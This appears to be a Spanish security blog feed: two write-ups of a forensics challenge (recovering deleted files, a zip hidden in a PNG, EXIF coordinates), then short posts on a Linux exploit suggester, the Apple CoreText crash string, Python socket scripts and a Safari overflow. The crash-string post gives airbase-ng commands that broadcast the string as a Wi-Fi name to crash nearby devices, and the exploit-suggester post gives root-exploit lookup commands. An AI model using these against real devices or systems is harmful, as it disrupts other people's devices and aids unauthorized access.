
la secuencia es la siguiente 'open case', 'new case' (rellenamos con el nombre del caso, detalles y nombre del agente o investigador), 'new case' (para confirmar), 'ad host' (datos del host para diferenciarlo de otros casos), 'add host' para confirmar... hasta aquí mera burocracia....

Ahora añadiremos la imagen del pendrive en cuestión, cargándola como partición, 'Symlink' y le daremos a 'next':

Ignoraremos el hash (no es necesario en esta ocasión, aunque podría haberlo sido), punto de montaje C: y sistema de archivos fat32.

Como hemos visto Autopsy ha detectado que clase de sistema de archivos era. Aplicaremos los cambios dándole a 'next' y nos aparece la siguiente pantalla:

Procederemos a analizar la imagen "ANALIZE" y posteriormente haremos un análisis de ficheros:

Lo cual nos llevará a una pantalla donde podremos recuperar los archivos previamente borrados:

Tras recuperar los archivos pasaremos a su examen..

Como podemos ver tenemos un archivo png y tres .cap mucha gente a optado por recuperar los .cap y examinarlos con otro programa como por ejemplo Wireshark, pero esto también lo podemos hacer directamente con Autopsy...

En nuestro primer examen a los archivos .cap nos encontramos con la siguiente pista:

Como vemos en un mail dirigido a un tal Carlo:

"Que pasa tio?
Te mando nuestro pequeño secreto "KNIFELONG1234"
bye
ya me pondre en contacto

un saludo yuri"

Siguiendo con el examen de los .cap no damos con más información relevante, así que es hora de pasar al otro archivo encontrado: 'rubiaca.png'. Para ello directamente con Autopsy haremos una copia del archivo a nuestro disco para su posterior análisis.

Haciendo una primera exploración el archivo parece ser un png normal y corriente pero veamos qué pasa si le "preguntamos" más...

Sospechando sabiamente que esta rubia esconde algo más que sus pechos, vamos hacer pasar un primer filtro que aunque, poco ortodoxo, si me ha sido de ayuda en muchos casos. Echaremos un vistazo rápido a las cadenas de caracteres que contiene el archivo... con strings:

#strings rubiaca.png

)@fW
!c*l(`
g#+cY@
k|R)]
,Dn$6
kl=a2z
cL4W
c4qO
$2
Zq98
6/\b
W(R&
"oUA
feD,
N~,,i
8&@VF6
'UW?-q9
J\Gh
78RNC
R>QP
Y;(In

autopsy.jpeg

¡¡¡Pero qué demonios: autopsy.jpg!!! Veamos qué es esto sometemos el archivo a un editor hexadecimal buscando esa cadena de texto que nos hace sospechar.

Ok, eso no debería estar ahí en un png normal. Algo huele a que están ocultando algo en este png, veamos si puede ser un fichero zip:

En efecto lo que sospechábamos... Llegados a este punto hay varias formas de extraer el archivo, pero quizás la mas ilustrativa sea simplemente renombrarlo.

cp rubiaca.png rubiaca.zip

Para nuestra sorpresa al intentar abrirla nos pide un password. Qué tal si probamos con el pequeño secreto que antes vimos cuando husmeábamos en los .cap KNIFELONG (sin los números).

Voilá!!! nos da como resultado de la descompresión una bonita imagen de los coches robados......

Parece plausible que el delincuente o un colega tomase la foto con su terminal, no habrán sido tan... pues veamos qué información podemos "arrancarle" a la foto tirando de metadatos...

Tan solo nos falta pasar esa dirección a Google y ¡¡¡bingo!!!

Damos con el paradero de los coches robados:

AVENIDA de la costa 10-11 MONACO

Unos garajes muy coquetos al igual que sospechosos:

Segunda solución

Veo oportuno publicar el siguiente reporte de la solución porque creo que como en todo hay mil formas de hacer las cosas y esta es una de las que más me sorprendió.

Aun siendo todas las soluciones válidas, de esta podemos aprender algo todos...

La solución en cuestión viene de la mano de Bruno Heras y sin más dilación aquí os la adjunto:

HackPlayers - Reto #18
Write Up - Bruno Heras - b0nk
-----------------------------

Bueno, para la resolución del reto, estos son los pasos que he seguido:

1. Descarga del archivo de imagen y primer análisis
===================================================

Primero he procedido a descargar el archivo y ejecutar "file" con tal de comprobar el tipo de sistema de ficheros que contenía:

% file image.iso
image.iso: x86 boot sector, mkdosfs boot message display, code offset 0x58, OEM-ID " mkdosfs", Media descriptor 0xf8, heads 125, sectors 102400 (volumes > 32 MB) , FAT (32 bit), sectors/FAT 788, serial number 0xc9694824, label: "           "

Acto seguido, he montado la imagen:

% hdiutil mount image.iso
/dev/disk1                                              /Volumes/Untitled

Al comprobar qué había, tan sólo encontré el directorio ".Trash-1000", totalmente vacío:

./.Trash-1000:
total 5
1 drwxrwxrwx 1 srm staff   512 13 ago 03:32 .
1 drwxrwxrwx@ 1 srm staff   512 16 ago 23:48 ..
1 drwxrwxrwx 1 srm staff   512 13 ago 03:32 files
2 drwxrwxrwx 1 srm staff 1024 13 ago 03:32 info

./.Trash-1000/files:
total 2
1 drwxrwxrwx 1 srm staff 512 13 ago 03:32 .
1 drwxrwxrwx 1 srm staff 512 13 ago 03:32 ..

./.Trash-1000/info:
total 3
2 drwxrwxrwx 1 srm staff 1024 13 ago 03:32 .
1 drwxrwxrwx 1 srm staff   512 13 ago 03:32 ..

Así que desmonté el volumen:

% hdiutil unmount /Volumes/Untitled
"/Volumes/Untitled" unmounted successfully.

2. Segundo análisis
===================

En este segundo análisis, eché mano de The Sleuth Kit con tal de analizar el volumen más a fondo. Una primera pasada, me mostró lo siguiente:

% fls -a -d -f fat -u -p -r image.iso

r/r * 4: captura1.pcap
r/r * 6: captura2.cap
r/r * 8: captura3.cap
r/r * 10: rubiaca.png
d/d 12: .Trash-1000
d/d 12: .Trash-1000/.
d/d 2: .Trash-1000/..
d/d 205014: .Trash-1000/info
d/d 205014: .Trash-1000/info/.
d/d 12: .Trash-1000/info/..
r/r * 205031: .Trash-1000/info/captura1.pcap.trashinfo
r/r * 205034: .Trash-1000/info/captura2.cap.trashinfo
r/r * 205037: .Trash-1000/info/captura3.cap.trashinfo
r/r * 205040: .Trash-1000/info/rubiaca.png.trashinfo
r/r * 205108: .Trash-1000/info/rubiaca.png.trashinfo.YBMO1W
d/d 205016: .Trash-1000/files
d/d 205016: .Trash-1000/files/.
d/d 12: .Trash-1000/files/..
r/r * 205046: .Trash-1000/files/captura1.pcap
r/r * 205048: .Trash-1000/files/captura2.cap
r/r * 205050: .Trash-1000/files/captura3.cap
r/r * 205052: .Trash-1000/files/rubiaca.png
v/v 1612675: $MBR
v/v 1612676: $FAT1
v/v 1612677: $FAT2
d/d 1612678: $OrphanFiles
-/d * 212230: $OrphanFiles/INFO
-/d * 212232: $OrphanFiles/FILES
-/r * 212359: $OrphanFiles/_APTUR~1.TRA
-/r * 212362: $OrphanFiles/_APTUR~2.TRA
-/r * 212365: $OrphanFiles/_APTUR~3.TRA
-/r * 212368: $OrphanFiles/_UBIAC~1.TRA
-/r * 212372: $OrphanFiles/_UBIAC~1.N8H
-/r * 212486: $OrphanFiles/_APTUR~1.PCA
-/r * 212488: $OrphanFiles/_APTURA2.CAP
-/r * 212490: $OrphanFiles/_APTURA3.CAP
-/r * 212492: $OrphanFiles/_UBIACA.PNG
-/r * 220816: $OrphanFiles/_~1.TRA
-/r * 220817: $OrphanFiles/_est.tmp
-/d * 220819: $OrphanFiles/TRASHE~1
-/d * 220821: $OrphanFiles/_SEVEN~1
-/d * 220827: $OrphanFiles/SPOTLI~1
-/r * 220830: $OrphanFiles/_DTUNE~1.EXE
-/d * 220832: $OrphanFiles/_SOLINUX
-/r * 220835: $OrphanFiles/_OTION~1.AVI
-/r * 220838: $OrphanFiles/_HDTUN~1.EXE
-/d * 220840: $OrphanFiles/_RESEED
-/r * 220842: $OrphanFiles/_BNPATHL.TXT
-/r * 220845: $OrphanFiles/_EADME~1.DIS
-/r * 220849: $OrphanFiles/_BUNTU
-/r * 232196: $OrphanFiles/_MP2CM~2.IDX
-/r * 232197: $OrphanFiles/_MP1CM~1.NEW
-/r * 232202: $OrphanFiles/_MP1CM~1.IDX
-/r * 232207: $OrphanFiles/_MP1CM~2.IDX
-/r * 232211: $OrphanFiles/_MP0CM~1.IDX
-/r * 232216: $OrphanFiles/_MP0CM~2.IDX
-/d * 939142: $OrphanFiles/STORE-V2
-/d * 939144: $OrphanFiles/STORE-V1
-/r * 939147: $OrphanFiles/VOLUME~1.PLI
-/d * 939272: $OrphanFiles/68870F~1
-/r * 939399: $OrphanFiles/VOLUME~1.PLI
-/d * 939783: $OrphanFiles/JOURNA~1.REP
-/r * 939784: $OrphanFiles/psid.db
-/r * 939787: $OrphanFiles/TMP~1.SNO
-/r * 939789: $OrphanFiles/0~3.IND
-/r * 939791: $OrphanFiles/LION~1.CRE
-/r * 939793: $OrphanFiles/INDEXS~1
-/r * 939796: $OrphanFiles/0~1.IND
-/r * 939799: $OrphanFiles/0~2.IND
-/r * 939801: $OrphanFiles/0~4.IND
-/r * 939804: $OrphanFiles/0~1.SHA
-/r * 939806: $OrphanFiles/0~5.IND
-/r * 939808: $OrphanFiles/0~6.IND
-/r * 939811: $OrphanFiles/0~1.DIR
-/r * 939815: $OrphanFiles/0DIREC~1.SHA
-/r * 939818: $OrphanFiles/0~2.SHA
-/r * 939821: $OrphanFiles/0~7.IND
-/r * 939824: $OrphanFiles/0~8.IND
-/r * 939827: $OrphanFiles/0~9.IND
-/r * 939829: $OrphanFiles/SHUTDO~1
-/r * 939831: $OrphanFiles/PERMST~1
-/r * 939833: $OrphanFiles/_~9.IND
-/r * 939836: $OrphanFiles/_~1.IND
-/r * 939839: $OrphanFiles/_~8.IND
-/r * 939842: $OrphanFiles/_~2.IND
-/r * 939845: $OrphanFiles/_~2.IND
-/r * 939846: $OrphanFiles/_~1.IND
-/r * 939848: $OrphanFiles/_~3.IND
-/r * 939851: $OrphanFiles/_~1.SHA
-/r * 939853: $OrphanFiles/_~4.IND
-/r * 939855: $OrphanFiles/_~5.IND
-/r * 939858: $OrphanFiles/_MPMER~1.IND
-/r * 939859: $OrphanFiles/_MP2CM~1.SHA
-/r * 939862: $OrphanFiles/_~2.SHA
-/r * 939863: $OrphanFiles/store.db
-/r * 939865: $OrphanFiles/STORE~1.DB
-/r * 939868: $OrphanFiles/REVERS~1
-/r * 939870: $OrphanFiles/LION~1.MOD
-/d * 939872: $OrphanFiles/JOURNA~1.LIV
-/r * 939875: $OrphanFiles/JOURNA~1
-/d * 939877: $OrphanFiles/JOURNA~1.SCA
-/r * 939881: $OrphanFiles/REVERS~1.SHA
-/r * 939884: $OrphanFiles/_~1.IND
-/r * 939886: $OrphanFiles/_~5.IND
-/r * 939889: $OrphanFiles/LIVE0~1.SHA
-/r * 939892: $OrphanFiles/LIVE0~1.IND
-/r * 939895: $OrphanFiles/LIVE0~2.SHA
-/r * 939897: $OrphanFiles/_~4.IND
-/r * 939900: $OrphanFiles/_~1.SHA
-/r * 939904: $OrphanFiles/_DIREC~1.SHA
-/r * 962437: $OrphanFiles/_ournal.1
-/r * 962438: $OrphanFiles/retire.1
-/r * 962565: $OrphanFiles/_ournal.1
-/r * 962566: $OrphanFiles/_ournal.9
-/r * 962567: $OrphanFiles/retire.17
-/r * 966531: $OrphanFiles/_~7.SHA
-/r * 966533: $OrphanFiles/_~3.IND
-/r * 966536: $OrphanFiles/_~1.DIR
-/r * 966538: $OrphanFiles/_~6.IND
-/r * 966542: $OrphanFiles/LIVE0~3.SHA
-/r * 966545: $OrphanFiles/_~5.SHA
-/r * 966548: $OrphanFiles/LIVE0~6.IND
-/r * 966551: $OrphanFiles/LIVE0~1.DIR
-/r * 966555: $OrphanFiles/_DIREC~1.SHA
-/r * 966556: $OrphanFiles/_~3.IND
-/r * 966559: $OrphanFiles/LIVE0~4.SHA
-/r * 966561: $OrphanFiles/STORE~1.UPD
-/r * 966564: $OrphanFiles/REVERS~1.UPD
-/r * 966567: $OrphanFiles/_MPMER~2.IND
-/r * 966570: $OrphanFiles/_MPMER~3.IND
-/r * 966573: $OrphanFiles/_MPMER~4.IND
-/r * 966575: $OrphanFiles/_EMAPP~1
-/r * 966576: $OrphanFiles/_MPMER~5.IND
-/r * 966579: $OrphanFiles/_~8.IND
-/r * 966582: $OrphanFiles/_MPMER~6.IND
-/r * 966585: $OrphanFiles/LIVE0~7.SHA
-/r * 966589: $OrphanFiles/_MPMER~1.SHA
-/r * 966593: $OrphanFiles/LIVE0~2.IND
-/r * 966596: $OrphanFiles/LIVE0~3.IND
-/r * 966599: $OrphanFiles/LIVE0~4.IND
-/r * 966602: $OrphanFiles/LIVE0~9.IND
-/r * 966605: $OrphanFiles/LIVE0~11.IND
-/r * 966607: $OrphanFiles/_MP~5.IND
-/r * 966610: $OrphanFiles/LIVE0~10.IND
-/r * 966613: $OrphanFiles/_MPMER~8.IND
-/r * 966616: $OrphanFiles/LIVE0~5.IND
-/r * 966619: $OrphanFiles/LIVE0~7.IND
-/r * 966622: $OrphanFiles/LIVE0~8.IND
-/r * 966626: $OrphanFiles/LIVE0~5.SHA
-/r * 966630: $OrphanFiles/_MPMER~9.IND
-/r * 966633: $OrphanFiles/_MPME~10.IND
-/r * 966634: $OrphanFiles/_MP2CM~6.IND
-/r * 966635: $OrphanFiles/_DIREC~1.SHA
-/r * 966639: $OrphanFiles/LIVE0~6.SHA
-/r * 966643: $OrphanFiles/LIVE0D~1.SHA
-/r * 966646: $OrphanFiles/_MPME~11.IND
-/r * 966650: $OrphanFiles/_MPMER~1.DIR
-/r * 966654: $OrphanFiles/_MPMER~2.SHA
-/r * 966658: $OrphanFiles/_MPMER~3.SHA
La primera columna corresponde al tipo de archivo, la tercera columna es el inodo y la cuarta hace referencia al nombre del archivo.

Las opciones que pasé son las siguientes:

-a:   Muestra los directorios "." y "..".
-d:   Sólo muestra los elementos eliminados.
-f:   Especifico el sistema de archivos, en este caso, "fat".
-u:   Muestra elementos *no* eliminados.
-p:   Muestra la ruta completa del archivo.
-r:   Recursivo.

Decido guardar la lista:

% fls -a -d -f fat -u -p -r image.iso > lista_archivos.txt

Una vez tengo la lista en mi poder, hago un pequeño script para recuperar los archivos. Para ello hice un pequeño script que recorría la lista obtenida con fls, recuperaba el archivo y generaba el hash md5 correspondiente:

--------- recuperar.sh ---------

#!/bin/bash
# recuperar.sh
#
# uso: ./recuperar.sh -l|-r 
#       -l:   lista los archivos encontrados basándose en la lista
#       -r:   recupera archivos encontrados y genera md5
# fls -a -d -f fat -u -p -r image.iso

# Listamos archivos a recuperar
function list {
echo "Listando archivos a recuperar..."
echo "--------------------------------"

cat $1 |
while read line; do
  tipo=$(echo "$line" | awk {'print $1'})
  inode=$(echo "$line" | awk {'print $3'})
  inode=${inode%:}
  nombre=$(echo "$line" | awk {'print $4'})

    if [ $tipo == "v/v" ]; then
      nombre=$(echo $line | awk {'print $3'})
      echo "[!] Omitiendo archivo $nombre"
    elif [ $tipo == "d/d" ]; then
      inode=$(echo "$line" | awk {'print $2'})
      inode=${inode%:}
      nombre=$(echo "$line" | awk {'print $3'})
      echo "[D] Se creará directorio $nombre"
    else
      echo "[A] Se recuperará el archivo $nombre"
    fi
done
}

# Recuperamos archivos
function recuperar {
echo "Recuperando archivos..."
echo "-----------------------"

if [ -f "lista.md5" ]; then
  rm lista.md5
fi
        
cat $1 |
  while read line; do
    tipo=$(echo "$line" | awk {'print $1'})
    inode=$(echo "$line" | awk {'print $3'})
    inode=${inode%:}
    nombre=$(echo "$line" | awk {'print $4'})

    if [ $tipo == "v/v" ]; then
      echo "[!] Omitiendo archivo $nombre"
    elif [ $tipo == "d/d" ]; then
      inode=$(echo "$line" | awk {'print $2'})
      inode=${inode%:}
      nombre=$(echo "$line" | awk {'print $3'})
      echo "[D] Recuperando directorio $nombre"
      mkdir "$nombre"
    else
      icat -f fat -r -s $2 "$inode" > "$nombre"
      if [ $? -eq 0 ]; then
        # md5 en OS X, md5sum en Linux
        md5=$(md5 "$nombre" | cut -d\= -f2)
        echo "$nombre - $md5" >> lista.md5
        echo "[A] Recuperando archivo $nombre con md5:$md5"
      else
        echo "[!] Error! No se ha podido recuperar $nombre!"
      fi
    fi
done
}

# Args
case $1 in
  "-l" )
    list $2 $3;;
  "-r" )
    recuperar $2 $3;;
  * )
    echo "Uso: -l|-r ";;
esac

3. Un primer vistazo a los resultados
=====================================

Los archivos que más llaman la atención son las capturas de tráfico de red y la foto de la rubiaca.

Si abrimos la foto nos vamos a encontrar a la rubiaca en cuestión, en los pcaps vemos un poco de todo. Después de echarles un vistazo por encima, se observa, en el segundo archivo (captura2.cap), el envío de un correo electrónico en texto plano. Para obtener todo el dialógo, podemos utilizar tshark con el siguiente filtro:

---------
% tshark -r captura2.cap -Y "ip.src eq 192.168.1.190 and tcp.port eq 25"
34 109.055673 192.168.1.190 -> 173.194.67.27 TCP 74 45978 > smtp [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=6759518 TSecr=0 WS=64
36 109.100969 192.168.1.190 -> 173.194.67.27 TCP 66 45978 > smtp [ACK] Seq=1 Ack=1 Win=14656 Len=0 TSval=6759530 TSecr=1740062804
38 109.142837 192.168.1.190 -> 173.194.67.27 TCP 66 45978 > smtp [ACK] Seq=1 Ack=52 Win=14656 Len=0 TSval=6759540 TSecr=1740062849
39 109.142959 192.168.1.190 -> 173.194.67.27 SMTP 78 C: EHLO thosi
42 109.188853 192.168.1.190 -> 173.194.67.27 SMTP 103 C: MAIL FROM: SIZE=411
44 109.229845 192.168.1.190 -> 173.194.67.27 SMTP 93 C: RCPT TO:
47 109.629477 192.168.1.190 -> 173.194.67.27 SMTP 72 C: DATA
50 109.670184 192.168.1.190 -> 173.194.67.27 IMF 480 subject: COCHES, from: YURI@gmail.com\r\n, , Que pasa tio? , Te mando nuestro peque\303\261o secreto "KNIFELONG1234" , bye , ya me pondre en contacto ,   , un saludo yuri
52 109.731985 192.168.1.190 -> 173.194.67.27 SMTP 72 C: QUIT
53 109.732057 192.168.1.190 -> 173.194.67.27 TCP 66 45978 > smtp [FIN, ACK] Seq=503 Ack=361 Win=15680 Len=0 TSval=6759688 TSecr=1740063439
55 109.772157 192.168.1.190 -> 173.194.67.27 TCP 54 45978 > smtp [RST] Seq=503 Win=0 Len=0
57 109.777856 192.168.1.190 -> 173.194.67.27 TCP 54 45978 > smtp [RST] Seq=503 Win=0 Len=0
59 109.778430 192.168.1.190 -> 173.194.67.27 TCP 54 45978 > smtp [RST] Seq=504 Win=0 Len=0
tshark: The file "captura2.cap" appears to have been cut short in the middle of a packet.
---------

Bueno, ya tenemos algo. El pequeño secreto OMAGAWD!

4. La rubiaca
=============

Después de ojear las capturas de tráfico, me lancé a por la rubia. Si miramos la cabecera del archivo, tiene toda la pinta de ser un PNG normal y corriente:

---------
00000000   89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 00 F0 00 00 01 90 08 02 00 00 00 1F B4 7A .PNG........IHDR...............z
00000020   2B 00 00 00 09 70 48 59 73 00 00 0B 13 00 00 0B 13 01 00 9A 9C 18 00 00 00 07 74 49 4D 45 07 DD +....pHYs.................tIME..
00000040   08 0D 01 0E 1F B2 27 7C 01 00 00 00 41 74 45 58 74 43 6F 6D 6D 65 6E 74 00 43 52 45 41 54 4F 52 ......'|....AtEXtComment.CREATOR
00000060   3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69 6E 67 20 49 4A 47 20 4A 50 45 47 20 76 : gd-jpeg v1.0 (using IJG JPEG v
00000080   36 32 29 2C 20 71 75 61 6C 69 74 79 20 3D 20 39 30 0A B0 45 58 93 00 00 20 00 49 44 41 54 78 DA 62), quality = 90..EX... .IDATx.
---------
Si seguimos observando el fichero, veremos que en la posición 0x12865 (75877 bytes) acaba la que debería ser la última parte de un fichero PNG según la especificación (http://www.libpng.org/pub/png/spec/1.2/PNG-Chunks.html#C.IEND), que debería estar vacía. Seguimos mirando y vemos referencias a autopsy.jpeg, exactamente en 0x12883.

Así pues, me da por echarle un ojo al archivo con 7zip:

---------
% 7z l rubiaca.png                                                                                                                   v:⇣ l:0.66 0.79 0.80

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=utf8,Utf16=on,HugeFiles=on,2 CPUs)

Listing archive: rubiaca.png

--
Path = rubiaca.png
Type = zip
Physical Size = 27486
Offset = 75877

   Date      Time    Attr         Size   Compressed Name
   ------------------- ----- ------------ ------------ ------------------------
   2013-08-13 02:52:20 .....        27537        27342 autopsy.jpeg
   ------------------- ----- ------------ ------------ ------------------------
                                    27537        27342 1 files, 0 folders

---------

Vaya por dios! Podéis ver el offset? Otra pasada...

---------
% 7z l -slt rubiaca.png                                                                                                              v:⇣ l:0.69 0.79 0.80

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=utf8,Utf16=on,HugeFiles=on,2 CPUs)

Listing archive: rubiaca.png

--
Path = rubiaca.png
Type = zip
Physical Size = 27486
Offset = 75877

----------
Path = autopsy.jpeg
Folder = -
Size = 27537
Packed Size = 27342
Modified = 2013-08-13 02:52:20
Created =
Accessed =
Attributes = .....
Encrypted = +
Comment =
CRC =
Method = AES-128 Deflate
Host OS = Unix
Version = 51
---------

Bueno, ya tenemos el offset, la fecha en que se modificó el archivo y sabemos, además, que está cifrado. Hice un pequeño script en python para crear un archivo nuevo a partir del offset indicado:

--------- parte_rubiacas.py ---------

#!/usr/bin/python
# encoding: utf-8

import sys

# Abrimos ambos archivos:
f = open(sys.argv[1], "rw+")
print "[+] Archivo original: ", f.name
f2 = open(sys.argv[2], "arw+b")
print "[+] Archivo a crear: ", f2.name
print "[+] Offset: ", sys.argv[3]

# Nos vamos a la posición indicada
f.seek(int(sys.argv[3]))

# Escribimos el nuevo archivo
for line in f:
  f2.write(line)

# Cerramos ambos archivos
f.close()
f2.close()

------------------
Bien, esto lo ejecutamos tal que así: "./parto_rubiacas.py rubiaca.png rubiaca.zip 75877"

% ./parto_rubiacas.py rubiaca.png rubiaca.zip 75877                                                                                  v:⇣ l:0.64 0.70 0.75
[+] Archivo original: rubiaca.png
[+] Archivo a crear: rubiaca.zip
[+] Offset: 75877

Y nos genera el archivo zip, el cual descomprimimos con 7z y comprobamos si el tamaño de autopsy.jpeg es el correcto:

% 7z e rubiaca.zip                                                                                                                   v:⇣ l:1.02 0.82 0.79

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=utf8,Utf16=on,HugeFiles=on,2 CPUs)

Processing archive: rubiaca.zip

Extracting autopsy.jpeg
Enter password (will not be echoed) :

Everything is Ok

Size:       27537
Compressed: 27547

Nos pide contraseña, así que he utilizado "KNIFELONG", que ha colado sin problemas. El tamaño del archivo descomprimido es el mismo que nos indicaba 7zip cuando hemos dado el primer vistazo.

5. La afoto dentro de la afoto dentro de la...
==============================================

Abrimos la imagen y vemos coches y varias piezas, nada sospechoso. Tiramos exiftags:

---------
% exiftags autopsy.jpeg                                                                                                              v:⇣ l:0.42 0.54 1.06

Camera-Specific Properties:

Image-Specific Properties:

Horizontal Resolution: 1 dp
Vertical Resolution: 1 dp
Latitude: 43� 44' 16
Longitude: 7� 25' 22.3
---------

Si introducimos las coordenadas en google maps, nos vamos a mónaco, lo que parece ser un garaje:

https://maps.google.com/maps?q=%2B43%C2%B0+44%27+16.00%22,+7%C2%B0+25%27+22.30%22&um=1&ie=UTF-8&sa=N&tab=wl

Si echamos un vistazo a las capturas de tráfico y al resto de archivos huérfanos que hemos rescatado anteriormente, veremos que hay muchas peticiones a http://www.mcars-vip-scuderia.com/, por lo que todo apunta a que esta gente robaba los coches a pelo y se los llevaba a mónaco o bien los "robaba" contratando algún servicio de MCARS VIP SCUDERIA y desaparecían del mapa, en el edificio con 3 puertas de garaje en Mónaco, que ahí no dan la nota los cochecillos del estilo.

Agradecimientos y ganadores

Como siempre daros las gracias a todos aquellos que os hayais esforzado en trabajar y resolver el reto, con especial mención a los ganadores que han conseguido el honor de permanecer en nuestro hall de la fama para la eternidad.

¡Hasta el próximo reto!

↧

...y para Linux permítame sugerirle el exploit...

August 28, 2013, 4:54 am

≫ Next: El "texto de la muerte" para los usuarios de Apple

≪ Previous: Solucion al reto 18 "un pendrive y el caso de los coches robados"

¡Linux Exploit Suggester es un sencillo script en Perl que, basándose en la versión del kernel, identifica rápidamente las vulnerabilidades conocidas y sugiere exploits para conseguir root en una prueba de intrusión ~~legítima~~. Bon appétit!

# wget https://github.com/PenturaLabs/Linux_Exploit_Suggester/raw/master/Linux_Exploit_Suggester.pl

# uname -r
3.2.0-23-generic

# perl ./Linux_Exploit_Suggester.pl -k 3.2

Kernel local: 3.2

Possible Exploits:
[+] perf_swevent
CVE-2013-2094
Source: http://www.exploit-db.com/download/26131

↧

El "texto de la muerte" para los usuarios de Apple

August 30, 2013, 4:24 am

≫ Next: Cómo crear una conexión cliente-servidor TCP o UDP con Python

≪ Previous: ...y para Linux permítame sugerirle el exploit...

Más que el "texto de la muerte" para los usuarios de Apple esta entrada debería llamarse "el bug en CoreText que permite que una cadena de caracteres en árabe haga fallar a las aplicaciones de iOS 6 y Mac OS X 10.8".

Efectivamente, un error en el API de CoreText, el framework de renderizado de fuentes de Apple, provoca que la siguiente cadena de caracteres árabigos سمَـَّوُوُحخ ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ (traducida Smoouhkh ̷̴̐ ̷̴̐ x x x ̷̴̐ Amartykh ̷̴̐ x) haga fallar cualquier aplicación de iOS y Mac OS que lo utilice.

Se ha confirmado la vulnerabilidad en Mac OS 10.8 (Mountain Lion) y iOS 6, de hecho, cualquier con ese SO no podrá leer este post puesto que el navegador se le habrá cerrado XD. Las versiones de iOS inferiores a 6 y 7 beta, Mac OS inferiores a 10.8 y 10.9 beta parecen no verse afectadas por este problema.

El fallo fue descubierto en un foro ruso hace un par de días, si bien parece que ya se conocía hace meses (hay tweets con esa cadena de caracteres desde febrero) y Apple no ha reaccionado.

A partir de aquí mucho juego porque el fallo puede reproducirse de muchas maneras:

- Enviando un sms a un iPhone: ojo porque además una vez recibido no podrás abrir más 'Mensajes'. Ver habrahabr.ru/post/191654 / #comment_6658802.

- Enviando un mensaje vía iMessages en iOS o desktop Messages en Mac OS: un tanto de lo mismo.

- Abriendo una página que contenga ese texto, por ejemplo https://zhovner.com/tmp/killwebkit.html: el navegador Safari en iOS simplemente se cerrará. En este caso, si no se elimina el historial de visitas, al volver a entrar no funcionará. El escritorio Safari se comportará de la misma manera. Chrome, el nuevo Opera y Yandeks.Brauzer mostraran el error en las pestañas pero seguirán trabajando. Como nota, sitios como Twitter o Facebook ya han empezado a bloquear publicaciones con este texto...

- Publicando una red inalámbrica con el nombre SSID adecuado: imaginaros la cara de todos aquellos con todos los dispositivos con Wifi activado...

    root@kali:~# airmon-ng start wlan0
    root@kali:~# airbase-ng -e " ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ" -q -c 11 mon0

- Escribiendo el texto como nombre de usuario, créditos, etc. en juegos en línea, provocando el cierre de otros usuarios.

- Más diversión ¿?...

Fuentes:
https://news.ycombinator.com/item?id=6293824
https://facepunch.com/showthread.php?t=1302653&p=41997269
http://arstechnica.com/apple/2013/08/rendering-bug-crashes-os-x-and-ios-apps-with-string-of-arabic-characters/
http://techcrunch.com/2013/08/29/bug-in-apples-coretext-allows-specific-string-of-characters-to-crash-ios-6-os-x-10-8-apps/

↧

Cómo crear una conexión cliente-servidor TCP o UDP con Python

September 3, 2013, 4:13 pm

≫ Next: Publican exploit para bug (parcheado) en Safari

≪ Previous: El "texto de la muerte" para los usuarios de Apple

Crear una conexión cliente-servidor es facilísimo con Python. Para ello podemos ejecutar un pequeño script en el servidor que creará un socket en el número de puerto especificado y empezará a escuchar a la espera de que el cliente, otro sencillo script, se conecte simplemente indicando la dirección IP y puerto...

En Pastebin podemos encontrar un fantástico ejemplo de cada uno de los scripts, tanto para TCP como para UDP:

#TCPserver.py
#!/usr/bin/python          

import socket              

s = socket.socket()        
port = 11111  

s.bind(('', port))        

s.listen(5)  

while True:
   c, addr = s.accept()
   data=c.recv(1024)    
   print ('Address:',addr,'Data:',data)

   mylist=list(data.split(':'))
   intlist=list()
   for i in range(0,len(mylist)):
       intlist.append(int(mylist[i]))
   intlist.sort()
   c.send(str(intlist))
   c.close()

#TCPclient.py
#!/usr/bin/python          
import sys
import socket              

arglen=len(sys.argv)
if arglen<3:
    print('please run as python TCPclient.py <ip_address> <numbers>')
    exit()
data=str()
data=data+str(sys.argv[2])
for i in range(3,arglen):
    data=data+':'+str(sys.argv[i])

s = socket.socket()        

port = 11111          

s.connect((sys.argv[1], port))
s.send(data)
print s.recv(1024)
s.close

#UDPserver.py
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.bind(('',22222))
while True:
    data,addr=s.recvfrom(1024)
    print('Address:',addr,'Data:',data)
    mylist=list(data.split(':'))
    intlist=list()
    for i in range(0,len(mylist)):
        intlist.append(int(mylist[i]))
    intlist.sort()
    s.sendto(str(intlist),addr)

#UDPclient.py
#!/usr/bin/python
import socket
import sys

arglen=len(sys.argv)
if arglen<3:
    print('please run as python UDPclient.py <ip_address> <numbers>')
    exit()

s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
port=22222
addr=sys.argv[1]
data=str()
data=data+sys.argv[2]
for i in range(3,len(sys.argv)):
    data=data+':'+sys.argv[i]
s.sendto(data,(addr,port))
data,addr=s.recvfrom(1024)
print data

↧

Publican exploit para bug (parcheado) en Safari

September 4, 2013, 3:09 pm

≫ Next: Web recomendada: ./Dragon-Master

≪ Previous: Cómo crear una conexión cliente-servidor TCP o UDP con Python

Packet Storm ha publicado hoy un exploit para una vulnerabilidad conocida (y parcheada) de desbordamiento de búfer en el navegador Safari de Apple.
Afecta a la versión 6.0.1 de iOS 6 y OS X 10.7/8 y posiblemente anteriores y sus detalles fueron facilitados por el investigador de seguridad independiente Vitaliy Toropov a través de su programa de recompensas de Packet Storm.

En concreto el desbordamiento de pila existe en el método JavaScriptCore JSArray::sort(...) del WebKit. Este método acepta funciones Javascript y llamadas definidas por el usuario y compara arrays. Si esta función de comparación reduce la longitud de array, entonces los elementos del array restantes serán escritos fuera del buffer "m_storage>-m_vector[]", lo que conduce a la corrupción de la pila de la memoria.

